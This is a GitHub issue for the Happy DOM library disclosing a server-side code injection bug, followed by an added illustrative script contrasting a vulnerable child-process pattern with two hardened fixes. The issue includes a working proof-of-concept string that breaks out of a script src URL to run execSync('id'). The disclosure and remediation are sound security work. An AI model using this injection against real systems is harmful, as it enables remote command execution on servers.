Security vulnerability that allows for scripts to execute on the server #1585

Closed
capricorn86 opened this issue Nov 5, 2024 · 0 comments · Fixed by #1586 or #1588
Labels: bug, high priority
capricorn86 commented Nov 5, 2024

Thank you @kevin-mizu for finding this vulnerability!

This code snippet shows how it is possible to inject a server-side script into the "src" of a `<script>` tag. As Happy DOM uses `child_process.execFileSync()` in order to perform the fetch synchronously, the script could be injected by escaping from the URL string.

```javascript
const { Window } = require("happy-dom");

const window = new Window();
const document = window.document;

document.write(`<script src="https://localhost:8080/'+require('child_process').execSync('id')+'"></script>`);
```

@capricorn86 capricorn86 added the bug Something isn't working label Nov 5, 2024
@capricorn86 capricorn86 self-assigned this Nov 5, 2024
capricorn86 added a commit that referenced this issue Nov 6, 2024
…e code to be executed by a <script> tag (#1586)

* fix: [#1585] Fixes security vulnerability that allowed for server side code to be executed by a <script> tag

* chore: [#1585] Fixes unit test
capricorn86 added a commit that referenced this issue Nov 6, 2024
sparksam added a commit to safeinsights/trusted-output-app that referenced this issue Nov 7, 2024
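
The root cause described in the issue, shown as an added example that is not part of the original issue and is not Happy DOM's own code: a simplified model in which a parent process builds the source for a `node -e` child, first by pasting the URL into the source text and then in two hardened forms. The function names, the echo-only child and the harmless arithmetic payload are assumptions made for illustration.

```javascript
const { execFileSync } = require("child_process");

// Constructed, harmless stand-in for the issue's payload: the quote closes the
// string literal, and the arithmetic result proves the text was run as code.
const CRAFTED_URL = "https://localhost:8080/'+(6*7)+'";

// Model child process: it only echoes the URL it believes it was given.
function runChild(source, stdin = "") {
  return execFileSync(process.execPath, ["-e", source], {
    input: stdin,
    encoding: "utf8",
    timeout: 10000,
  });
}

// Vulnerable pattern: the URL is interpolated into the child's source text.
function echoUrlVulnerable(url) {
  return runChild(`const url = '${url}'; process.stdout.write(url);`);
}

// Hardened pattern 1: the child's source is a constant and the URL travels
// as data on stdin, so nothing attacker-controlled is ever parsed as code.
const FIXED_SOURCE =
  "process.stdout.write(JSON.parse(require('fs').readFileSync(0, 'utf8')).url);";
function echoUrlViaStdin(url) {
  return runChild(FIXED_SOURCE, JSON.stringify({ url }));
}

// Hardened pattern 2: if the value must appear in source, emit it with
// JSON.stringify, which escapes quotes, backslashes and line breaks.
function echoUrlAsLiteral(url) {
  return runChild(`const url = ${JSON.stringify(url)}; process.stdout.write(url);`);
}

console.log("vulnerable :", echoUrlVulnerable(CRAFTED_URL));
console.log("via stdin  :", echoUrlViaStdin(CRAFTED_URL));
console.log("as literal :", echoUrlAsLiteral(CRAFTED_URL));
```

In the vulnerable form the child prints a URL ending in `42`, which shows the expression was evaluated; both hardened forms return the crafted URL unchanged.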